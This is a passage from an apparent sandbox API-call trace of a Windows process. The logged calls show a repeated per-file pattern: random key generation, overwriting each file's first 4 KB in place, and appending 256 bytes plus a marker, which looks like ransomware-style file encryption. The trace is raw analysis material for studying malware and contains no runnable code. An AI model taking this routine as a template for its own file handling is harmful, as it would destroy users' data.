hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.127] SetFilePointerEx (in: hFile=0x8b0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.127] WriteFile (in: hFile=0x8b0, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.127] WriteFile (in: hFile=0x8b0, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.127] GetProcessHeap () returned 0x4f10000 [0082.127] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.128] CloseHandle (hObject=0x8b0) returned 1 [0082.128] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 77 [0082.128] SetFilePointerEx (in: hFile=0x8b4, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.129] ReadFile (in: hFile=0x8b4, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.129] SetFilePointerEx (in: hFile=0x8b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.129] GetProcessHeap () returned 0x4f10000 [0082.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.129] GetProcessHeap () returned 0x4f10000 [0082.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.129] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.129] GetProcessHeap () returned 0x4f10000 [0082.129] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.129] ReadFile (in: hFile=0x8b4, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.177] SetFilePointerEx (in: hFile=0x8b4, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.177] WriteFile (in: hFile=0x8b4, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.177] GetProcessHeap () returned 0x4f10000 [0082.177] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.178] GetProcessHeap () returned 0x4f10000 [0082.178] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d51418 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f878 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x4f70a70 | out: hHeap=0x4f10000) returned 1 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.179] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.179] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f878 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.180] GetProcessHeap () returned 0x4f10000 [0082.180] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d395c8 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x200) returned 0x7d397d0 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d395c8 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x220) returned 0x7cf6bf8 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d397d0 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12358 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56898 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.181] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7cf6bf8 | out: hHeap=0x4f10000) returned 1 [0082.181] GetProcessHeap () returned 0x4f10000 [0082.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56528 | out: hHeap=0x4f10000) returned 1 [0082.182] SetFilePointerEx (in: hFile=0x8b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.182] WriteFile (in: hFile=0x8b4, lpBuffer=0x7d7f770*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x7d7f770*, lpNumberOfBytesWritten=0x758fd44*=0x100, lpOverlapped=0x0) returned 1 [0082.182] WriteFile (in: hFile=0x8b4, lpBuffer=0x758fd48*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x758fd48*, lpNumberOfBytesWritten=0x758fd44*=0x4, lpOverlapped=0x0) returned 1 [0082.182] GetProcessHeap () returned 0x4f10000 [0082.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x8b600d0 | out: hHeap=0x4f10000) returned 1 [0082.182] GetProcessHeap () returned 0x4f10000 [0082.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d56870 | out: hHeap=0x4f10000) returned 1 [0082.182] GetProcessHeap () returned 0x4f10000 [0082.182] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d7f770 | out: hHeap=0x4f10000) returned 1 [0082.182] CloseHandle (hObject=0x8b4) returned 1 [0082.183] InterlockedExchangeAdd (in: Addend=0x40f168, Value=1 | out: Addend=0x40f168) returned 78 [0082.183] SetFilePointerEx (in: hFile=0x8b8, liDistanceToMove=0xfffffffc, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.183] ReadFile (in: hFile=0x8b8, lpBuffer=0x758fd4c, nNumberOfBytesToRead=0x4, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x758fd4c*, lpNumberOfBytesRead=0x758fd08*=0x0, lpOverlapped=0x0) returned 1 [0082.183] SetFilePointerEx (in: hFile=0x8b8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0082.183] GetProcessHeap () returned 0x4f10000 [0082.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x100) returned 0x7d7f770 [0082.183] GetProcessHeap () returned 0x4f10000 [0082.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x20) returned 0x7d56870 [0082.183] SystemFunction036 (in: RandomBuffer=0x7d56870, RandomBufferLength=0x20 | out: RandomBuffer=0x7d56870) returned 1 [0082.183] GetProcessHeap () returned 0x4f10000 [0082.183] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x1000) returned 0x8b600d0 [0082.183] ReadFile (in: hFile=0x8b8, lpBuffer=0x8b600d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x758fd08, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesRead=0x758fd08*=0x1000, lpOverlapped=0x0) returned 1 [0082.233] SetFilePointerEx (in: hFile=0x8b8, liDistanceToMove=0xfffff000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0082.233] WriteFile (in: hFile=0x8b8, lpBuffer=0x8b600d0*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x758fd44, lpOverlapped=0x0 | out: lpBuffer=0x8b600d0*, lpNumberOfBytesWritten=0x758fd44*=0x1000, lpOverlapped=0x0) returned 1 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.233] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12358 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.233] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.233] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x8, Ptr=0x7d12368, Size=0x20) returned 0x7d56528 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.233] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.233] RtlReAllocateHeap (Heap=0x4f10000, Flags=0x0, Ptr=0x7d12368, Size=0x20) returned 0x7d56898 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.233] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x8, Size=0x4) returned 0x7d12368 [0082.233] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.234] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.234] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12378 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x8) returned 0x7d12368 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12378 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x24) returned 0x7d4bb68 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d12368 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x40) returned 0x7d51418 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] HeapFree (in: hHeap=0x4f10000, dwFlags=0x0, lpMem=0x7d4bb68 | out: hHeap=0x4f10000) returned 1 [0082.235] GetProcessHeap () returned 0x4f10000 [0082.235] RtlAllocateHeap (HeapHandle=0x4f10000, Flags=0x0, Size=0x80) returned 0x4f70a70 [0082.236] GetProcessHeap () returned 0x4f10000 [0082.236] HeapFree (in: 